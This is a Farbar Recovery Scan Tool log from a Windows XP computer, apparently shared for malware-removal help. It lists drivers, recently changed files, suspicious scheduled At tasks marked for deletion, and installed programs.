S3 CCDECODE; C:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-14] (Microsoft Corporation)
R0 MpFilter; C:\WINDOWS\System32\DRIVERS\MpFilter.sys [214696 2013-09-27] (Microsoft Corporation)
S3 NdisIP; C:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-14] (Microsoft Corporation)
R2 NPF; C:\WINDOWS\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)
R3 NVENETFD; C:\WINDOWS\System32\DRIVERS\NVENETFD.sys [54016 2008-01-29] (NVIDIA Corporation)
R3 nvnetbus; C:\WINDOWS\System32\DRIVERS\nvnetbus.sys [22016 2008-01-29] (NVIDIA Corporation)
R3 pfc; C:\WINDOWS\System32\drivers\pfc.sys [10368 2004-04-01] (Padus, Inc.)
R2 X4HS32Ex; C:\Program Files\Free Ride Games\X4HS32Ex.Sys [53280 2009-04-06] (Exent Technologies Ltd.)
S1 awikfypi; \??\C:\WINDOWS\system32\drivers\awikfypi.sys [X]
S1 eygjlels; \??\C:\WINDOWS\system32\drivers\eygjlels.sys [X]
S3 int15.sys; \??\c:\acernb\int15.sys [X]
S1 pnjvxpgn; \??\C:\WINDOWS\system32\drivers\pnjvxpgn.sys [X]
U5 Tcpip6; C:\Windows\System32\Drivers\Tcpip6.sys [226880 2010-02-11] (Microsoft Corporation)
U1 WS2IFSL;

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

Error(0) reading file: "C:\WINDOWS\system32\ "
2014-03-20 09:51 - 2014-03-20 09:52 - 00025321 _____ () C:\Documents and Settings\Buddy Harris\Desktop\FRST.txt
2014-03-20 09:51 - 2014-03-20 09:51 - 00000000 ____D () C:\FRST
2014-03-20 08:36 - 2014-03-20 08:36 - 01145856 _____ (Farbar) C:\Documents and Settings\Buddy Harris\Desktop\FRST.exe
2014-03-18 18:31 - 2014-03-19 20:32 - 00002418 _____ () C:\WINDOWS\wmsetup.log
2014-03-18 15:27 - 2014-03-18 15:27 - 00000000 ____D () C:\Avenger
2014-03-18 08:59 - 2014-03-18 08:59 - 00000786 _____ () C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2014-03-18 08:59 - 2014-03-18 08:59 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes' Anti-Malware
2014-03-18 08:59 - 2013-04-04 14:50 - 00022856 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2014-03-17 19:35 - 2014-03-18 15:24 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\QueeenCoupon
2014-03-17 09:37 - 2014-03-17 09:08 - 00000232 _____ () C:\Documents and Settings\Buddy Harris\Start Menu\Programs\~ Realtek HD Sound Effect Manager.lnk
2014-03-17 09:36 - 2014-03-17 09:08 - 00000232 _____ () C:\Documents and Settings\Buddy Harris\Start Menu\Shortcut to Realtek HD Sound Effect Manager.lnk
2014-03-17 09:08 - 2014-03-17 09:08 - 00000232 _____ () C:\Documents and Settings\Buddy Harris\Desktop\Shortcut to Realtek HD Sound Effect Manager.lnk
2014-03-16 16:05 - 2014-03-16 16:05 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2930275$
2014-03-16 16:05 - 2014-03-16 16:05 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2929961$
2014-02-23 13:06 - 2014-02-23 13:06 - 00064240 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2014-02-23 12:58 - 2014-02-23 12:58 - 00001740 _____ () C:\Documents and Settings\All Users\Start Menu\Programs\Adobe Audition 1.5.lnk
2014-02-23 12:58 - 2014-02-23 12:58 - 00001734 _____ () C:\Documents and Settings\All Users\Desktop\Adobe Audition 1.5.lnk
2014-02-23 12:53 - 2014-02-23 12:53 - 00000000 ____D () C:\WINDOWS\Downloaded Installations
2014-02-23 10:57 - 2014-02-23 10:57 - 00000000 ____D () C:\Program Files\Deealu44Real
2014-02-23 10:09 - 2014-02-23 10:10 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\WinRAR
2014-02-23 10:07 - 2014-03-18 07:57 - 00000000 ____D () C:\Program Files\MyPC Backup
2014-02-23 10:07 - 2014-02-23 10:07 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Start Menu\Programs\Weather Alerts
2014-02-23 10:05 - 2014-03-19 08:51 - 00000372 _____ () C:\WINDOWS\Tasks\Re-Markable_wd.job
2014-02-23 10:05 - 2014-02-23 10:06 - 00000000 ____D () C:\Program Files\Re-Markable

==================== One Month Modified Files and Folders =======

2014-03-20 09:52 - 2014-03-20 09:51 - 00025321 _____ () C:\Documents and Settings\Buddy Harris\Desktop\FRST.txt
2014-03-20 09:51 - 2014-03-20 09:51 - 00000000 ____D () C:\FRST
2014-03-20 09:28 - 2014-02-17 01:28 - 00000420 _____ () C:\WINDOWS\Tasks\At27.job
2014-03-20 09:28 - 2014-02-12 01:28 - 00000420 _____ () C:\WINDOWS\Tasks\At26.job
2014-03-20 09:28 - 2013-07-29 08:28 - 00000420 _____ () C:\WINDOWS\Tasks\At25.job
2014-03-20 09:23 - 2012-04-14 17:28 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2014-03-20 09:15 - 2011-05-24 11:27 - 01774850 _____ () C:\WINDOWS\WindowsUpdate.log
2014-03-20 09:03 - 2010-06-02 11:05 - 00000898 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2014-03-20 08:42 - 2010-01-09 09:41 - 00000458 _____ () C:\WINDOWS\Tasks\COMODO System Cleaner Update.job
2014-03-20 08:36 - 2014-03-20 08:36 - 01145856 _____ (Farbar) C:\Documents and Settings\Buddy Harris\Desktop\FRST.exe
2014-03-20 08:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At9.job
2014-03-20 07:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At8.job
2014-03-20 06:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At7.job
2014-03-20 05:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At6.job
2014-03-20 04:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At5.job
2014-03-20 03:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At4.job
2014-03-20 02:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At3.job
2014-03-20 01:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At2.job
2014-03-20 00:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At1.job
2014-03-19 23:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At24.job
2014-03-19 22:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At23.job
2014-03-19 21:29 - 2011-05-24 11:29 - 00032596 _____ () C:\WINDOWS\SchedLgU.Txt
2014-03-19 21:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At22.job
2014-03-19 20:32 - 2014-03-18 18:31 - 00002418 _____ () C:\WINDOWS\wmsetup.log
2014-03-19 20:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At21.job
2014-03-19 19:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At20.job
2014-03-19 18:57 - 2012-11-30 17:35 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\Dropbox
2014-03-19 18:50 - 2012-11-30 17:44 - 00000000 ___RD () C:\Documents and Settings\Buddy Harris\My Documents\Dropbox
2014-03-19 18:49 - 2009-08-02 10:37 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\Audacity
2014-03-19 18:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At19.job
2014-03-19 18:00 - 2009-12-24 11:42 - 00000488 _____ () C:\WINDOWS\Tasks\Norton Security Scan for Buddy Harris.job
2014-03-19 17:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At18.job
2014-03-19 16:52 - 2009-07-14 18:33 - 00000000 ____D () C:\~~~~
2014-03-19 16:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At17.job
2014-03-19 15:37 - 2010-03-22 12:27 - 00000300 _____ () C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-21-608057341-2165517387-3308722516-1005.job
2014-03-19 15:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At16.job
2014-03-19 14:47 - 2011-05-24 13:28 - 00000436 ____H () C:\WINDOWS\Tasks\User_Feed_Synchronization-{042C18C8-CDF0-49EE-A260-F2CEEBFEDE6A}.job
2014-03-19 14:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At15.job
2014-03-19 13:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At14.job
2014-03-19 12:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At13.job
2014-03-19 11:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At12.job
2014-03-19 10:48 - 2009-03-13 11:26 - 00000000 ____D () C:\WINDOWS\system32\Restore
2014-03-19 10:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At11.job
2014-03-19 09:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At10.job
2014-03-19 09:02 - 2013-11-24 17:13 - 00000384 ____H () C:\WINDOWS\Tasks\Microsoft Antimalware Scheduled Scan.job
2014-03-19 08:52 - 2011-05-24 11:30 - 00000159 _____ () C:\WINDOWS\wiadebug.log
2014-03-19 08:52 - 2011-05-24 11:30 - 00000049 _____ () C:\WINDOWS\wiaservc.log
2014-03-19 08:52 - 2009-07-14 17:16 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Start Menu\Programs\CyberLink DVD Suite
2014-03-19 08:52 - 2009-03-13 11:25 - 00000000 ____D () C:\WINDOWS\Registration
2014-03-19 08:51 - 2014-02-23 10:05 - 00000372 _____ () C:\WINDOWS\Tasks\Re-Markable_wd.job
2014-03-19 08:51 - 2013-08-01 06:33 - 00000280 _____ () C:\WINDOWS\Tasks\RealUpgradeLogonTaskS-1-5-18.job
2014-03-19 08:51 - 2010-06-02 11:05 - 00000894 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2014-03-19 08:51 - 2009-03-13 11:29 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-03-19 08:50 - 2009-07-14 17:16 - 00000178 ___SH () C:\Documents and Settings\Buddy Harris\ntuser.ini
2014-03-18 15:33 - 2009-03-13 03:22 - 00691510 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2014-03-18 15:27 - 2014-03-18 15:27 - 00000000 ____D () C:\Avenger
2014-03-18 15:26 - 2009-07-14 17:16 - 00000000 ____D () C:\Documents and Settings\Buddy Harris
2014-03-18 15:24 - 2014-03-17 19:35 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\QueeenCoupon
2014-03-18 15:24 - 2014-02-17 01:28 - 00000000 ____D () C:\Documents and Settings\NetworkService\Application Data\DigitalSites
2014-03-18 15:24 - 2014-02-12 01:28 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\DigitalSites
2014-03-18 15:24 - 2014-01-30 19:33 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\PnngToPPTCeounVerrt
2014-03-18 15:24 - 2013-12-15 18:49 - 00000000 ____D () C:\Program Files\Optimizer Pro
2014-03-18 15:24 - 2013-07-29 08:28 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\DigitalSite
2014-03-18 15:24 - 2011-11-09 16:41 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\WeCareReminder
2014-03-18 11:39 - 2011-11-11 13:56 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-03-18 11:35 - 2011-09-04 10:41 - 00000000 ____D () C:\Program Files\Yontoo Layers Runtime
2014-03-18 08:59 - 2014-03-18 08:59 - 00000786 _____ () C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2014-03-18 08:59 - 2014-03-18 08:59 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes' Anti-Malware
2014-03-18 08:59 - 2011-11-10 15:16 - 00000000 ____D () C:\Program Files\Malwarebytes' Anti-Malware
2014-03-18 07:57 - 2014-02-23 10:07 - 00000000 ____D () C:\Program Files\MyPC Backup
2014-03-18 00:28 - 2013-07-30 08:28 - 00000055 _____ () C:\Documents and Settings\NetworkService\Application Data\WB.CFG
2014-03-17 19:36 - 2014-01-24 14:17 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\1936fdbe5dd46c0d
2014-03-17 10:36 - 2012-08-22 14:58 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\vlc
2014-03-17 09:08 - 2014-03-17 09:37 - 00000232 _____ () C:\Documents and Settings\Buddy Harris\Start Menu\Programs\~ Realtek HD Sound Effect Manager.lnk
2014-03-17 09:08 - 2014-03-17 09:36 - 00000232 _____ () C:\Documents and Settings\Buddy Harris\Start Menu\Shortcut to Realtek HD Sound Effect Manager.lnk
2014-03-17 09:08 - 2014-03-17 09:08 - 00000232 _____ () C:\Documents and Settings\Buddy Harris\Desktop\Shortcut to Realtek HD Sound Effect Manager.lnk
2014-03-17 08:26 - 2013-03-24 18:54 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Torch
2014-03-17 08:21 - 2009-07-25 16:45 - 00000000 ____D () C:\Program Files\CamStudio
2014-03-16 16:23 - 2009-03-13 03:22 - 00258248 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2014-03-16 16:22 - 2011-11-11 14:31 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-03-16 16:06 - 2011-11-11 13:55 - 00001374 _____ () C:\WINDOWS\imsins.BAK
2014-03-16 16:06 - 2009-09-30 09:39 - 00000000 ____D () C:\WINDOWS\ie8updates
2014-03-16 16:05 - 2014-03-16 16:05 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2930275$
2014-03-16 16:05 - 2014-03-16 16:05 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2929961$
2014-03-16 16:03 - 2011-11-11 14:32 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Silverlight
2014-03-16 00:28 - 2013-07-31 00:28 - 00000036 _____ () C:\Documents and Settings\Buddy Harris\Application Data\WB.CFG
2014-03-15 16:47 - 2009-07-14 19:07 - 00100352 _____ () C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-03-14 06:47 - 2013-08-01 06:33 - 00000288 _____ () C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-18.job
2014-03-13 16:01 - 2013-03-27 07:06 - 00000724 _____ () C:\Documents and Settings\Buddy Harris\Desktop\Time Warner phone.txt
2014-03-12 09:25 - 2012-04-14 17:28 - 00692616 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2014-03-12 09:25 - 2011-07-07 09:15 - 00071048 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2014-03-04 10:19 - 2012-08-22 14:58 - 00000721 _____ () C:\Documents and Settings\All Users\Desktop\VLC media player.lnk
2014-02-24 16:24 - 2009-03-13 11:15 - 00174592 ____N (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2014-02-24 16:24 - 2009-03-13 11:15 - 00174592 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\ie4uinit.exe
2014-02-24 07:46 - 2009-09-30 09:30 - 00012800 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\xpshims.dll
2014-02-24 07:46 - 2009-03-13 11:26 - 00759296 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\vgx.dll
2014-02-24 07:46 - 2009-03-13 11:16 - 01216000 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\urlmon.dll
2014-02-24 07:46 - 2009-03-13 11:16 - 01216000 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2014-02-24 07:46 - 2009-03-13 11:16 - 00920064 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\wininet.dll
2014-02-24 07:46 - 2009-03-13 11:16 - 00920064 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2014-02-24 07:46 - 2009-03-13 11:16 - 00105984 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\url.dll
2014-02-24 07:46 - 2009-03-13 11:16 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\url.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 06022144 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\mshtml.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 06022144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 00611840 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\mstime.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 00611840 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstime.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 00206848 ____N (Microsoft Corporation) C:\WINDOWS\system32\occache.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 00206848 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\occache.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 00067072 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\mshtmled.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 00067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2014-02-24 07:45 - 2012-06-12 17:24 - 00522240 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\jsdbgui.dll
2014-02-24 07:45 - 2010-12-24 10:53 - 00743424 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\iedvtool.dll
2014-02-24 07:45 - 2009-09-30 09:30 - 00247808 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\ieproxy.dll
2014-02-24 07:45 - 2009-04-29 00:55 - 11113472 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\ieframe.dll
2014-02-24 07:45 - 2009-04-29 00:55 - 02006016 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\iertutil.dll
2014-02-24 07:45 - 2009-04-29 00:55 - 00630272 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\msfeeds.dll
2014-02-24 07:45 - 2009-04-29 00:55 - 00055296 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\msfeedsbs.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 01469440 ____N (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2014-02-24 07:45 - 2009-03-13 11:15 - 01469440 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\inetcpl.cpl
2014-02-24 07:45 - 2009-03-13 11:15 - 00387584 ____N (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00387584 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\iedkcs32.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00184320 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\iepeers.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00043520 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\licmgr10.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\licmgr10.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00025600 ____N (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00025600 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\jsproxy.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00018944 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\corpol.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\corpol.dll
2014-02-24 07:45 - 2007-08-13 22:54 - 11113472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2014-02-24 07:45 - 2007-08-13 22:54 - 00630272 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2014-02-24 07:45 - 2007-08-13 22:54 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeedsbs.dll
2014-02-24 07:45 - 2007-08-13 22:34 - 02006016 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2014-02-24 06:54 - 2009-03-13 11:15 - 00385024 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
2014-02-23 13:06 - 2014-02-23 13:06 - 00064240 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2014-02-23 13:04 - 2014-02-13 16:44 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Deealu44Real
2014-02-23 12:58 - 2014-02-23 12:58 - 00001740 _____ () C:\Documents and Settings\All Users\Start Menu\Programs\Adobe Audition 1.5.lnk
2014-02-23 12:58 - 2014-02-23 12:58 - 00001734 _____ () C:\Documents and Settings\All Users\Desktop\Adobe Audition 1.5.lnk
2014-02-23 12:56 - 2009-07-14 17:16 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\Adobe
2014-02-23 12:56 - 2009-03-13 11:57 - 00000000 ____D () C:\Program Files\Adobe
2014-02-23 12:53 - 2014-02-23 12:53 - 00000000 ____D () C:\WINDOWS\Downloaded Installations
2014-02-23 10:57 - 2014-02-23 10:57 - 00000000 ____D () C:\Program Files\Deealu44Real
2014-02-23 10:18 - 2009-03-13 11:16 - 00001158 _____ () C:\WINDOWS\system32\wpa.dbl
2014-02-23 10:10 - 2014-02-23 10:09 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\WinRAR
2014-02-23 10:07 - 2014-02-23 10:07 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Start Menu\Programs\Weather Alerts
2014-02-23 10:06 - 2014-02-23 10:05 - 00000000 ____D () C:\Program Files\Re-Markable

Files to move or delete:
====================
C:\Windows\Tasks\At1.job
C:\Windows\Tasks\At10.job
C:\Windows\Tasks\At11.job
C:\Windows\Tasks\At12.job
C:\Windows\Tasks\At13.job
C:\Windows\Tasks\At14.job
C:\Windows\Tasks\At15.job
C:\Windows\Tasks\At16.job
C:\Windows\Tasks\At17.job
C:\Windows\Tasks\At18.job
C:\Windows\Tasks\At19.job
C:\Windows\Tasks\At2.job
C:\Windows\Tasks\At20.job
C:\Windows\Tasks\At21.job
C:\Windows\Tasks\At22.job
C:\Windows\Tasks\At23.job
C:\Windows\Tasks\At24.job
C:\Windows\Tasks\At25.job
C:\Windows\Tasks\At26.job
C:\Windows\Tasks\At27.job
C:\Windows\Tasks\At3.job
C:\Windows\Tasks\At4.job
C:\Windows\Tasks\At5.job
C:\Windows\Tasks\At6.job
C:\Windows\Tasks\At7.job
C:\Windows\Tasks\At8.job
C:\Windows\Tasks\At9.job


==================== Bamital & volsnap Check =================

C:\WINDOWS\explorer.exe => MD5 is legit
C:\WINDOWS\system32\winlogon.exe => MD5 is legit
C:\WINDOWS\system32\svchost.exe => MD5 is legit
C:\WINDOWS\system32\services.exe => MD5 is legit
C:\WINDOWS\system32\User32.dll => MD5 is legit
C:\WINDOWS\system32\userinit.exe => MD5 is legit
C:\WINDOWS\system32\rpcss.dll => MD5 is legit
C:\WINDOWS\system32\Drivers\volsnap.sys => MD5 is legit

==================== End Of Log ============================

|*****************************************************************************************************************|

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 13-03-2014  01
Ran by Buddy Harris at 2014-03-20 09:54:13
Running from C:\Documents and Settings\Buddy Harris\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

AV: Microsoft Security Essentials (Disabled - Up to date) {EDB4FA23-53B8-4AFA-8C5D-99752CCA7095}

==================== Installed Programs ======================

Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1.377 - Adobe Systems Incorporated)
Acrobat.com (Version: 0.0.0 - Adobe Systems Incorporated) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 1.0.4990 - Adobe Systems Inc.)
Adobe AIR (Version: 1.0.8.4990 - Adobe Systems Inc.) Hidden
Adobe Audition 1.5 (HKLM\...\{86EF9FC4-F209-4520-B7E1-C7FF0EEBDFFF}) (Version: 1.5 - Adobe Systems)
Adobe Flash Player 12 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 12.0.0.77 - Adobe Systems Incorporated)
Adobe Flash Player 12 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 12.0.0.77 - Adobe Systems Incorporated)
Adobe Reader X (10.1.8) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.8 - Adobe Systems Incorporated)
Agere Systems PCI-SV92EX Soft Modem (HKLM\...\Agere Systems Soft Modem) (Version:  - Agere Systems)
ASPCA TriMini Reminder by We-Care.com v5.0.2.1 (HKLM\...\{7E482AF6-AA1F-4CC5-BA13-0536675F5744}) (Version: 5.0.2.1 - We-Care.com)
Audacity 1.3.14 (Unicode) (HKLM\...\Audacity 1.3 Beta (Unicode)_is1) (Version:  - Audacity Team)
AVS Audio Converter 7.2 (HKLM\...\AVS Audio Converter_is1) (Version: 7.2.2.529 - Online Media Technologies Ltd.)
AVS Audio Editor version 4.2 (HKLM\...\AVS Audio Editor_is1) (Version:  - Online Media Technologies Ltd.)
AVS Audio Recorder version 3.9 (HKLM\...\AVS Audio Recorder 3.9_is1) (Version:  - Online Media Technologies Ltd.)
AVS Cover Editor 1.3.1.96 (AVS4YOU) (HKLM\...\AVSCoverEditor_AVS4YOU_is1) (Version:  - Online Media Technologies Ltd.)
AVS Disc Creator version 3.5 (HKLM\...\AVS Disc Creator_is1) (Version:  - Online Media Technologies Ltd.)
AVS Music Mix version 3.8 (HKLM\...\AVS Music Mix 3.8_is1) (Version:  - Online Media Technologies Ltd.)
AVS Photo Editor (HKLM\...\AVS Photo Editor_is1) (Version:  - Online Media Technologies Ltd.)
AVS Registry Cleaner 2.3.2.257 (HKLM\...\AVS Registry Cleaner_is1) (Version: 2.3.2.257 - Online Media Technologies Ltd.)
AVS Registry Cleaner version 2.2 (HKLM\...\AVSRegistryCleaner_is1) (Version:  - Online Media Technologies Ltd.)
AVS Ringtone Maker version 1.6 (HKLM\...\AVS Ringtone Maker 1.6_is1) (Version:  - Online Media Technologies Ltd.)
AVS Screen Capture version 2.0.2 (HKLM\...\AVS Screen Capture_is1) (Version:  - Online Media Technologies Ltd.)
AVS Update Manager 1.0 (HKLM\...\AVS Update Manager_is1) (Version:  - Online Media Technologies Ltd.)
AVS Video Converter 6 (HKLM\...\AVS4YOU Video Converter 6_is1) (Version:  - Online Media Technologies Ltd.)
AVS Video Editor 6 (HKLM\...\AVS Video Editor_is1) (Version:  - Online Media Technologies Ltd.)
AVS Video Recorder 2.5 (HKLM\...\AVS Video Recorder_is1) (Version:  - Online Media Technologies Ltd.)
AVS YouTube Uploader version 2.1 (HKLM\...\AVS YouTube Uploader 2.1_is1) (Version:  - Online Media Technologies Ltd.)
AVS4YOU Software Navigator 1.4 (HKLM\...\AVS4YOU Software Navigator_is1) (Version:  - Online Media Technologies Ltd.)
Choice Guard (Version: 1.2.87.0 - Microsoft Corporation) Hidden
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Core FTP LE 2.1 (HKLM\...\Core FTP LE 2.1) (Version:  - )
Critical Update for Windows Media Player 11 (KB959772) (HKLM\...\KB959772_WM11) (Version:  - Microsoft Corporation)
CyberLink LabelPrint (HKLM\...\{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.0.3111 - CyberLink Corp.)
CyberLink Media Suite 8 (HKLM\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 8.0.2820b - CyberLink Corp.)
CyberLink Media Suite 8 (Version: 8.0.2820b - CyberLink Corp.) Hidden
CyberLink Power2Go 7 (HKLM\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 7.0.0.2719b - CyberLink Corp.)
CyberLink Power2Go 7 (Version: 7.0.0.2719b - CyberLink Corp.) Hidden
CyberLink PowerBackup 2.5 (HKLM\...\{ADD5DB49-72CF-11D8-9D75-000129760D75}) (Version: 2.5.9102 - CyberLink Corp.)
CyberLink PowerDVD (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 7.0.3409.a - PowerDVDCorp.)
CyberLink YouCam 3.1 (HKLM\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.1.5324 - CyberLink Corp.)
CyberLink YouCam 3.1 (Version: 3.1.5324 - CyberLink Corp.) Hidden
